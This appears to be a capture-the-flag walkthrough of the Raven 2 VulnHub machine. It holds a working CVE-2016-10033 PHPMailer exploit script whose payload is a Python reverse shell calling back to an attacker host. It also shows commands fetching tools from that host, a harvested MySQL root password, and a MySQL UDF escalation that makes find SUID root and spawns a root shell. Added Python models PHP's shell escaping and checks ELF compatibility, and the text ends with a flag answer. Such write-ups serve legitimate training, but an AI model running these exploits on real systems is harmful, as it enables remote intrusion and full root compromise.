0x00 Introduction
Raven 2 is a medium-difficulty boot2root virtual machine with four flags to find. After being compromised several times, Raven Security has taken extra measures to harden its web server against intrusion.
VM download: https://download.vulnhub.com/raven/Raven2.ova
0x01 Host discovery
1. Scanning the target's whole subnet (192.168.1.0/24) with a port-scanning tool on Windows shows that 192.168.1.12 is the target VM, with ports 80, 22 and 111 open.

2. On Linux, live hosts can be found with arp-scan or netdiscover; in this run the target VM came up as 192.168.1.101 (the target's address varies through this writeup because the VM was rescanned in different sessions; substitute whatever your scan returns).
root@backlion# arp-scan -l
or
root@backlion# netdiscover -r 192.168.1.0/24


0x02 Port scanning
1. Scan the target's ports with nmap:
nmap -A 192.168.1.12

2. Ports 22, 80 and 111 are open. Port 80 runs a web application, which is the way into the system. Brute-forcing SSH on port 22 is not recommended: the system password on this box is strong.

0x03 Directory brute-forcing
1. On Linux, dirb can be used to brute-force directories.

2. DirBuster on Windows does the same job and shows the directory tree more visually.

3. A few top-level directories come back. Going through each one's contents, two interesting files turn up under /vendor/: http://192.168.1.32/vendor/PATH contains flag1 together with the absolute path of the web root.

4. http://192.168.1.12/vendor/VERSION gives a version number, but on its own does not say which piece of software it belongs to.

The same directory also contains PHPMailerAutoload.php, so taken together the site is using PHPMailer 5.2.16.
0x04 Reverse shell
1. On Kali, searchsploit can be used directly to look for PHPMailer exploits:
root@kali2018:~# searchsploit phpmailer
------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
PHPMailer 1.7 - 'Data()' Remote Denial of Service | exploits/php/dos/25752.txt
PHPMailer < 5.2.18 - Remote Code Execution (Bash) | exploits/php/webapps/40968.php
PHPMailer < 5.2.18 - Remote Code Execution (PHP) | exploits/php/webapps/40970.php
PHPMailer < 5.2.18 - Remote Code Execution (Python) | exploits/php/webapps/40974.py
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit) | exploits/multiple/webapps/41688.rb
PHPMailer < 5.2.20 - Remote Code Execution | exploits/php/webapps/40969.pl
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Exe | exploits/php/webapps/40986.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | exploits/php/webapps/42221.py
PHPMailer < 5.2.21 - Local File Disclosure | exploits/php/webapps/43056.py
WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit) | exploits/php/remote/42024.rb
------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

cp /usr/share/exploitdb/exploits/php/webapps/40974.py /opt
cd /opt
2. Alternatively, search exploit-db.com; the exploit used here is:
https://www.exploit-db.com/exploits/40974

Make a few small changes to the exploit:
a. Add a `# -*- coding: utf-8 -*-` declaration at the top, otherwise the non-ASCII characters in the banner and comments make the interpreter error out.
b. Set target to the VM's IP address and to the vulnerable page, contact.php.
c. Change the backdoor filename. For whatever reason the default backdoor.php never worked; renaming the payload file to shell.php finally did (the script as listed below uses backlion.php; the name only has to be the same in the -X argument of the email field and in the backdoor variable).
d. Set the reverse-shell address to the IP and port of the host running the nc listener (the Kali machine).
e. Running the script requires the requests-toolbelt package (pip install requests-toolbelt); if pip cannot reach it, download the package and install it by hand.

3. The PoC after the changes (the unused imports and proxy settings of the original are dropped; the GET of the dropped file is made against the web root rather than under contact.php, which is where the original concatenation pointed it):
# -*- coding: utf-8 -*-
from requests_toolbelt import MultipartEncoder
import requests
import os

os.system('clear')
print("\n")
# (ASCII-art banner omitted)
print("    PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

base = 'http://192.168.1.12'        # web root of the target
target = base + '/contact.php'      # page that calls PHPMailer
backdoor = '/backlion.php'          # must match the -X path in the email field below

# PHP reverse shell; connects back to the nc listener on 192.168.1.11:4444
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.1.11\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'

# The email value passes PHPMailer's address validation, but once PHP's mail() hands it to
# /bin/sh as the -f (sender) argument the quotes split it into extra sendmail options:
# -X writes a transcript of the session (the payload above included) into the web root.
fields = {'action': 'submit',
          'name': payload,
          'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/backlion.php server\" @protonmail.com',
          'message': 'Pwned'}

m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers = {'User-Agent': 'curl/7.47.0',
           'Content-Type': m.content_type}

print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(), headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
# request the dropped file from the web root to trigger the reverse shell
r = requests.get(base + backdoor, headers=headers)
if r.status_code == 200:
    print('[+]ExPLoITeD ' + target)
4. Run the exploit. The script submits the contact form on contact.php; while serving that POST, PHPMailer calls sendmail with the injected options and sendmail writes its transcript, which contains the submitted fields including the PHP in the name field, to /var/www/html/shell.php (backlion.php if the script is used exactly as listed above).

5. Start nc listening on the Kali machine before touching the backdoor, on the port set in the payload (4444 in the script above).

6. Opening contact.php in a browser (http://192.168.1.12/contact.php) only shows the form; the backdoor file is created by the POST in step 4 and should now exist as shell.php.

7. Request the backdoor: http://192.168.1.12/shell.php. The file is a sendmail log rather than a clean PHP source file, but PHP treats everything outside the <?php ... ?> block as literal text and executes the block itself, so the reverse shell fires.

8. The reverse shell arrives on the nc listener.
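To see why the odd-looking email address in the exploit works, here is an added example, not part of the original exploit or of PHPMailer, that models in Python what PHP's mail() does with PHPMailer's Sender: it reimplements escapeshellcmd()'s quote-pairing rule, builds the command line the way mail() does with the default sendmail_path, and splits it the way /bin/sh would. The last function is a port of the allowlist PHPMailer later added (isShellSafe) that rejects such addresses. The exploit address is the one from the script above; the function names and the sendmail_path default are my assumptions.

```python
import shlex

# Characters PHP's escapeshellcmd() always prefixes with a backslash.
# Quotes are handled separately: only *unpaired* quotes get escaped.
_ALWAYS_ESCAPED = set('#&;`|*?~<>^()[]{}$\\\n\xff')


def php_escapeshellcmd(s):
    """Model of PHP's escapeshellcmd(): escapes shell metacharacters but leaves
    a matching pair of quotes alone, which is the behaviour CVE-2016-10033 abuses."""
    out = []
    close_at = None  # index of the quote that closes the currently open pair
    for i, ch in enumerate(s):
        if ch in ('"', "'"):
            if close_at is None:
                j = s.find(ch, i + 1)
                if j == -1:
                    out.append('\\')      # lone quote: escaped
                else:
                    close_at = j          # opening quote of a pair: kept as is
            elif i == close_at:
                close_at = None           # closing quote of the pair: kept as is
            else:
                out.append('\\')          # other quote type inside a pair: escaped
            out.append(ch)
        elif ch in _ALWAYS_ESCAPED:
            out.append('\\' + ch)
        else:
            out.append(ch)
    return ''.join(out)


def sendmail_argv(sender, sendmail_path='/usr/sbin/sendmail -t -i'):
    """What /bin/sh ends up executing when PHPMailer (< 5.2.18) passes
    '-f' . $this->Sender as mail()'s additional_parameters: PHP runs the string
    through escapeshellcmd(), appends it to sendmail_path and popen()s the result."""
    cmd = sendmail_path + ' ' + php_escapeshellcmd('-f' + sender)
    return shlex.split(cmd)  # POSIX word splitting, as sh -c would do


def is_shell_safe(s):
    """Allowlist in the spirit of PHPMailer's later isShellSafe(): only
    alphanumerics and @ _ - . may reach the sendmail command line."""
    return all(c.isalnum() or c in '@_-.' for c in s) and php_escapeshellcmd(s) == s


# The email field from the exploit above, as PHP sees it after form decoding.
EXPLOIT_SENDER = '"anarcoder\\" -OQueueDirectory=/tmp -X/var/www/html/backlion.php server" @protonmail.com'

if __name__ == '__main__':
    for addr in ('alice@example.com', EXPLOIT_SENDER):
        print(addr)
        print('  shell-safe:', is_shell_safe(addr))
        for arg in sendmail_argv(addr):
            print('   ', arg)
```

The paired quotes survive escapeshellcmd() untouched, so the shell sees `-fanarcoder\` as one word and `-OQueueDirectory=/tmp` and `-X/var/www/html/backlion.php` as separate sendmail options; -X makes sendmail log the whole session, message body included, to a file under the web root, and the queue directory is moved to /tmp so sendmail does not abort for lack of a writable queue.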

9. Go to the WordPress directory and read the database connection details from its config file:
cd /var/www/html/wordpress
cat wp-config.php


10. Check which user MySQL runs as (mysqld is running as root, and its command line also shows the plugin directory):
ps -ef | grep mysql

11. Log into the MySQL console with the credentials from wp-config.php; from there the server version and the plugin directory can be checked as well:
www-data@Raven:/var/www/html/wordpress$ mysql -u root -pR@v3nSecurity

12. A shell over nc has no tty, so interactive programs such as su do not work; upgrade to a pseudo-terminal with Python first:
python -c "import pty;pty.spawn('/bin/bash')"
The web directory turns out to contain flag2.txt:
cd /var/www
cat flag2.txt

13. Next, search the whole filesystem for flags:
www-data@Raven:/var/www/html$ find / -name "flag*" 2>/dev/null
This turns up flag3, which is an image; open it directly in the browser:
http://192.168.1.13/wordpress/wp-content/uploads/2018/11/flag3.png

14. Change to /tmp, download LinEnum.sh (a script that enumerates a wide range of basic and advanced details about a Linux host) and run it:
cd /tmp
wget http://192.168.1.109/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

LinEnum reports the MySQL-Exploit-Remote-Root-Code-Execution-Privesc issue (details: https://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html). Note that the route actually used below is the classic UDF technique rather than CVE-2016-6662 itself: mysqld runs as root and the database root password is known, so a shared library loaded as a user-defined function executes commands as root.

15. Next comes the privilege-escalation exploit https://www.exploit-db.com/exploits/1518 (Raptor's raptor_udf2.c, saved here as raptor_udf.c), which is compiled into a shared object on the attacking Kali machine:
root@kali2018:~# wget http://192.168.1.5/raptor_udf.c   # build on a 64-bit system: the .so must match the target's architecture, otherwise MySQL refuses to load it
root@kali2018:~# gcc -g -c raptor_udf.c
root@kali2018:~# gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
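The architecture remark on the wget line is the usual reason CREATE FUNCTION fails at the last step: mysqld will not load a shared object built for a different ELF class or machine than its own. As an added check, not part of this walkthrough's procedure or of raptor_udf.c, the following Python reads the ELF identification bytes of a shared object (the same fields `file raptor_udf.so` reports) and compares them with the target's `uname -m`. The function names, the mapping tables and the three 20-byte sample headers are constructed for this example.

```python
import struct

# e_machine values from the ELF specification, limited to what a Linux VM is likely to report
ELF_MACHINES = {0x03: 'i386', 0x3E: 'x86_64', 0x28: 'arm', 0xB7: 'aarch64'}

# what `uname -m` prints on the target, mapped onto the (ELF class, machine) mysqld expects
UNAME_TO_ELF = {'x86_64': (64, 'x86_64'), 'i686': (32, 'i386'), 'i386': (32, 'i386'),
                'armv7l': (32, 'arm'), 'aarch64': (64, 'aarch64')}

ET_EXEC, ET_DYN = 2, 3


def elf_info(blob):
    """Return (class_bits, machine, e_type) from an ELF header, or raise ValueError.
    Only the first 20 bytes are needed: e_ident (16 bytes), e_type, e_machine."""
    if len(blob) < 20 or blob[:4] != b'\x7fELF':
        raise ValueError('not an ELF file')
    bits = {1: 32, 2: 64}.get(blob[4])      # EI_CLASS
    endian = {1: '<', 2: '>'}.get(blob[5])  # EI_DATA decides how e_type/e_machine are read
    if bits is None or endian is None:
        raise ValueError('unknown ELF class or data encoding')
    e_type, e_machine = struct.unpack(endian + 'HH', blob[16:20])
    return bits, ELF_MACHINES.get(e_machine, hex(e_machine)), e_type


def udf_matches_target(blob, uname_m):
    """True if mysqld on a host whose `uname -m` is uname_m can dlopen() this object:
    it must be a shared object (ET_DYN) of the same ELF class and machine."""
    bits, machine, e_type = elf_info(blob)
    want = UNAME_TO_ELF.get(uname_m)
    if want is None:
        raise ValueError('unknown uname -m value: ' + uname_m)
    return e_type == ET_DYN and (bits, machine) == want


# Constructed sample headers (first 20 bytes only):
# magic, EI_CLASS, EI_DATA, EI_VERSION, EI_OSABI, EI_ABIVERSION, 7 bytes padding, e_type, e_machine
SO_X86_64 = b'\x7fELF' + bytes([2, 1, 1, 0, 0]) + b'\x00' * 7 + struct.pack('<HH', ET_DYN, 0x3E)
SO_I386 = b'\x7fELF' + bytes([1, 1, 1, 0, 0]) + b'\x00' * 7 + struct.pack('<HH', ET_DYN, 0x03)
EXE_X86_64 = b'\x7fELF' + bytes([2, 1, 1, 0, 0]) + b'\x00' * 7 + struct.pack('<HH', ET_EXEC, 0x3E)

if __name__ == '__main__':
    import sys
    # usage: python3 check_udf.py raptor_udf.so x86_64   (second argument: uname -m on the target)
    with open(sys.argv[1], 'rb') as f:
        header = f.read(64)
    print(elf_info(header), 'loadable on', sys.argv[2] + ':', udf_matches_target(header, sys.argv[2]))
```

Run it against the freshly built raptor_udf.so with the value of `uname -m` from the reverse shell before uploading; a 32-bit build against a 64-bit mysqld, or an executable instead of a shared object, is rejected here just as the server would reject it.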

16. On the target, fetch the compiled raptor_udf.so from the attacking machine:
www-data@Raven:/var/www/html/wordpress$ cd /tmp
www-data@Raven:/tmp$ wget http://192.168.1.11:8080/raptor_udf.so

Then escalate through a MySQL UDF by running the SQL below. The dumpfile path must be the plugin directory shown earlier in the process list (plugin-dir=/usr/lib/mysql/plugin), and the file must end up there because mysqld only loads UDF libraries from that directory. Once do_system exists, it is used to make /usr/bin/find SUID root, and find's -exec then spawns a root shell:
mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.08 sec)

mysql> insert into foo values(load_file('/tmp/raptor_udf.so'));
Query OK, 1 row affected (0.01 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';
Query OK, 1 row affected (0.11 sec)

mysql> create function do_system returns integer soname 'raptor_udf.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+---------------+----------+
| name      | ret | dl            | type     |
+-----------+-----+---------------+----------+
| do_system |   2 | raptor_udf.so | function |
+-----------+-----+---------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.01 sec)

mysql> exit
Bye
www-data@Raven:/tmp$ touch finn
www-data@Raven:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Raven:/tmp$ find finn -exec "/bin/sh" \;
# whoami
root
#


17. Finally, go to /root, where flag4.txt is waiting:
# cd /root
# ls
# cat flag4.txt
___ ___ ___
| _ \__ ___ _____ _ _ |_ _|_ _|
| / _` \ V / -_) ' \ | | | |
|_|_\__,_|\_/\___|_||_|___|___|
flag4{df2bc5e951d91581467bb9a2a8ff4425}

